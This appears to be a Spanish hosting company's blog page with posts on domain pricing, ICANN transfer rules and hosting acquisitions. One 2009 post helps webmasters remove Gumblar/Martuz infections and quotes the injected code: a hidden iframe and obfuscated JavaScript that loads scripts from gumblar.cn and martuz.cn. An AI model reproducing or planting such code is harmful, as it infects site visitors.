Fenixer cierra en Diciembre de 2009

El proveedor de servicios de alojamiento web y registro de dominios Fenixer.es dejará de prestar servicios el próximo 31 de Diciembre de 2009. Al parecer la crisis económica junto a otras circunstancias han forzado el cierre de la empresa.

En su propia web, fenixer notifica a sus clientes el inminente cierre y pone a su alcance la información necesaria para trasladar sus dominios y sitios web a otros proveedores.

 Fuente original: http://www.fenixer.es/ (comunicado de la empresa Fenixer sobre el cese de sus servicios).

Escrito por admin el 18 de Noviembre de 2009 con 0 comentarios
Lee más artículos sobre Alojamiento web y Empresas de hosting y Dominios.

Inyección de código y ataques al sitio web.

En los últimos meses se ha detectado un incremento notable de ataques de modificación  o inyección de código por parte de virus en sitios web de Internet.

Muchos webmasters de momento se dan cuenta que en los documentos de componen su sitio web aparecen líneas de código extrañas que muestran enlaces hacia sitios externos de forma invisible.

Realmente se trata de código que no ha sido introducido por el webmaster ni por su editor web sino que se trata de virus de tipo troyano que una vez que han infectado el PC del webmaster detectan buscan códigos ftp en el ordenador y los utiliza para inyectar el iframe en los documentos del sitio web.

Las páginas web que se ven afectados con más frecuencia son las del tipo index.php, index.htm, index.html, pero en ocasiones, en el caso de que el sitio web sea dinámico y  esté basado en plantillas, tpls etc (blogs, wikis, cms) pueden verse afectados todos los archivos del sitio.

Estos virus aprovechan la vulnerabilidad existente en versiones antiguas de softare como Adobe Reader (muy utilizado para abrir pdfs) o  Adobe Flash Player (software pare ejectuar películas de flash), aunque también puede producirse a través de otros programas.La forma más habitual de infección es la inyección de un iframe en el/los documentos html que componen el sitio.

Ejemplos de códigos maliciosos inyectados son:

<iframe src=”http://sitiomalicioso:8080/index.php” mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe>

O codigos más complejos como:

(function(jil){var xR5p=’%';eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”69ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);

En la mayoría de los casos la función no tiene nombre, es anónima y de autollamada.Estas acciones son provocadas por troyanos del tipo Gumblar, Martuz o variantes de los mismos. 

¿Como debo proceder para prevenir y/o eliminar la infección?

- Vacíe la caché de su navegador.

- Desactive la caché de su navegador.

- Desinstale los programas Adobe Acrobat Reader y Adobe Flash Player - Actualice su antivirus y haga un análisis completo de su ordenador

- Instale las últimas versiones de Adobe Acrobat Reader y Adobe Flash Player desde la web oficial de Adobe.

- Limpie el código malicioso, buscándolo en todas las páginas que conforman su sitio web y eliminando las líneas de código con aspecto similar a:

(function(){var G33z1=’%';var KlKj=’va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-2626(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d’;var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

_________________________________________________________________________________________

<iframe src=”http://sitiomalicioso:8080/index.php” mce_src=”http://sitiomalicioso:8080/index.php” width=107 height=152 style=”visibility: hidden”></iframe> __________________________________________________________________________________________var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;
if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzssfs)!=typeof(”A”))){
zrvzts=”A”;eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
document.w rite(”<script src=//martu”+”z.cn/vid/?id=”+j+”><\/script>”);}

La búsqueda del código malicioso, si el sitio web está compuesto por una gran cantidad de documentos puede ser una labor muy tediosa, para hacerlo algo más cómodo puede buscar en todo el sitio web automáticamente con su editor web por cadenas de palabras, por ejemplo:

Buscar en todo el sitio las palabras

Iframe

script src =” Martuz for-like

visibility: hidden

Cuando encuentre esas líneas de código, fíjese en ellas y si no han sido introducidas por usted, elimínelas de su código fuente en todos aquellos documentos de su web en los que estén presentes.

Una vez limpiado el código de su sitio web, recuerde CAMBIAR LA CONTRASEÑA FTP y solicitar a cualquier otra persona que haya tenido acceso a su hosting mediante ftp (diseñador web, programador …) que realice las mismas acciones.

Escrito por admin el 21 de Septiembre de 2009 con 0 comentarios
Lee más artículos sobre Alojamiento web.

ICANN quiere poner freno al ‘fraude’ de Network Solutions

Network solutions
Dias atras comenzaron las quejas de multidud de usuarios que utilizaban el whois de networksolutions para comprobar si el dominio que deseaban registrar estaba disponible. Una vez realizada su consulta sobre el whois, automáticamente el dominio que tenían intención de registrar aparecía como no disponible ya que había sido registrado por networksolutions, evitando de este modo que pudiera ser registrado en cualquier otro registrador. Esta acción, conocida como Domain Tasting no suponía ningún coste para networksolutions, ya que la política de ICANN concede un periodo de gracia (add grace period, AGP) de cinco días, durante el que se puede cancelar el registro de un dominio sin coste alguno.

De este modo, si el usuario, luego iba a otro registrador más barato para intentar registrar ese mismo dominio, éste le aparecía como registrado. Esto le obligaba a esperar unos días a que volviera a estar disponible o a registrarlo a través de NetworkSolutions.

Debido a estas accioens de competencia desleal, este 23 de enero la Junta Directiva de ICANN ha decidido poner freno al ‘chantaje’ de Network Solutions y ha dictado una resolución (con trece votos a favor, ninguno en contra y una abstención) por la que recomienda cobrar por cada dominio registrado, incluidos los que se cancelen dentro del periodo de gracia (AGP), lo cual evitaría registros masivos y automáticos como los que se venían realizando hasta la fecha por esta compañía.

Para poner freno a esta práctica se barajan tres posibles soluciones:

Revisar la tarifa de registro de la ICANN (que por lo visto actualmente es de 0,20$) y suspender la excepción para los dominios registrados mediante domain tasting.
 
Establecer una tarifa para quienes realicen una cantidad desproporcionada de cancelaciones.

Eliminar definitivamente el periodo de gracia.

Escrito por admin el 29 de Agosto de 2008 con 1 comentario
Lee más artículos sobre Dominios.

Suben los precios de los dominios .com y .net


Al parecer, a partir del próximo día 15 de octubre de 2007 Verisign incrementará el precio de los dominios .com un 7% y el de los .net un 10%.
 
Los dominios .com pasarán de una tasa de $6.00 a $6.42. Los dominios .net pasarán de $3.50 a $3.85. Este es el primer incremento para los .com y .net desde 1999.
Teóricamente esta acción de la empresa norteamericana podría tener un reflejo directo sobre los precios de los registars, que podrían aumentar sus precios ligeramente. Ahora bien, dado que el dolar está bastante por debajo del euro, puede que esta subida no afecte a los clientes de empresas proveedoras de servicios europeas, ya que estas podrían seguir manteniendo los precios de los registros simplemente dejando de ganar unos centimos por dominio, por lo menos mientras el dolar se mantenga por debajo del euro.
VeriSign justifica la subida de las tasas de los dominios con los siguientes razonamientos:
Las peticiones medias diarias a la infraestructura de DNS de VeriSign han pasado de los 1.000 millones en 1.999 a los casi 30.000 millones de hoy. Asimismo, el tráfico ha aumentado en una proporción similar. Las infraestructura de  los .com y .net se estan escalando y fortificando para defenderse de los cada vez más numerosos y sofisticados ciberataques. Los agujeros de seguridad han crecido un 700% desde el año 2.000 y se espera que crezcan un 50% en 2007 y 2008.

Para hacer frente al aumento del tráfico y fortalecer la seguridad y estabilidad, VeriSign anunció el Proyecto Titan, que expandiría la infraestructura global de Internet 10 veces para el 2.010. Bajo este proyecto, VeriSign aumentará durante los tres próximos años la capacidad de recibir peticiones DNS de las 400.000 millones diarias hasta las 4 billones diarias. Además quiere aumentar el ancho de banda de Centros Primarios de Resolución de los 20 Gbps a 200 Gbps. También expandirá su Red Regional de Centros de Resolución con más de 100 centros dispersados por todo el planeta para el 2.010

Escrito por admin el 26 de Septiembre de 2007 con 0 comentarios
Lee más artículos sobre Dominios.

Modificación en la normativa para el traslado de dominios

Auth code

ICANN (Internet Corporation for Assigned Names and Numbers) ha modificado la normativa para el traslado de dominios. A partir de ahora para trasladar un dominio .com, .net, .org, .info o .biz entre empresas de servicios de interet, será necesario que se indique el AUTH CODE o SECRET CODE del dominio.  Hasta ahora esta norma sólo afectaba a los dominios .org y .info. Esto se debe al cambio en el protocolo internacional de transferencias, que pasa de ser RRP (Registry Registrar Protocol) a una nueva especificación, llamada EPP (Extensible Provisioning Protocol), que nace para asegurar el traslado no fraudulento de dominios.

Por lo tanto, para trasladar un dominio entre proveedores de servicios de Internet o registradores, será necesario averiguar este código. Por regla general los proveedores con un buen sistema de gestión de dominios deben facilitarle este código a través del panel de control del dominio, no obstante, si las herramientas de gestión de su dominio en su actual proveedor no le permiten obtener el Auth-Code, para trasladar su dominio deberá solicitarlo a dicho proveedor o directamente a la entidad registradora (Register con el que trabaje su proveedor).

Escrito por admin el 17 de Junio de 2007 con 1 comentario
Lee más artículos sobre Dominios.

El grupo italiano Dada ha comprado Nominalia

Dada compra nominalia 

El grupo italiano Dada ha comprado la totalidad del capital del proveedor español de dominios de internet Nominalia por un total de 5,2 millones de euros. La operación se ha realizado a través de Register, filial de Dada.

La adquisición forma parte de la estrategia de crecimiento internacional del grupo transalpino y de la consolidación de su negocio relacionado con los dominios de internet.

En los cinco primeros meses de este año, Nominalia obtuvo unos ingresos de 2,5 millones de euros y un beneficio operativo antes de impuestos, intereses y amortizaciones (Ebitda) de 649.000 euros, mientras que en el ejercicio de 2005 facturó 3,8 millones de euros, con un Ebitda de 830.000 euros.

De la cantidad acordada en la operación, que asciende a 5,2 millones de euros un primer pago de 2,6 millones de euros se efectuará de inmediato. Register pasará a controlar el 66% de Cotei, holding que posee el 75% de Nominalia y, por tanto, indirectamente, el 50,1% del proveedor de dominios de Internet.

Con el segundo pago, que ascenderá a 1,3 millones de euros y está previsto que se efectúe en febrero de 2007, Register tomará el restante 33% de Cotei, con lo que pasará a controlar el 100% de este holding e, indirectamente, el 75% de Nominalia.

El tercer y último pago, también de 1,3 millones de euros y previsto para enero de 2008, servirá para que la compañía italiana adquiera el 25% restante del capital de Nominalia, empresa que emplea a 35 personas y una de las pioneras en el registro de dominios de Internet en España.
(fuente: sedo.com)

Escrito por admin el 17 de Junio de 2007 con 1 comentario
Lee más artículos sobre Empresas de hosting.

Nazca compra Acens Technologies por 40 millones de euros

Acens y Nazca

La sociedad española de capital riesgo Nazca ha adquirido a la firma española Acens Technologies, líder en España en servicios informáticos y de tecnología a pequeñas empresas, según el comunicado enviado por la firma de inversión.

En la operación han participado también José Cerdán, consejero delegado de Acens Technologies, y Aleph Capital, uno de los accionistas fundadores de la empresa española. La operación se ha valorado en más 40 millones de euros, según fuentes conocedoras de la transacción.

Nazca contará con cuatro representantes en el consejo de Acens, José Cerdán y otro representante de Aleph Capital. Miguel Canalejo, presidente de Nazca, asumirá la presidencia de Acens. En su comunicado Nazca indica que prevé invertir cerca de 20 millones de euros en la expansión de la compañía.

La sociedad de capital riesgo Nazca ha realizado en los últimos cinco años 10 inversiones por más de 300 millones de euros y participa en el capital de Bodegas Vinartis, Dibaq, Guzmán, Hedonaï, Lizarrán y El Derecho y ha desinvertido ya en Rodilla, Unipost y Svenson.

(fuente: cincodias.com)

Escrito por admin el 17 de Junio de 2007 con 0 comentarios
Lee más artículos sobre Empresas de hosting.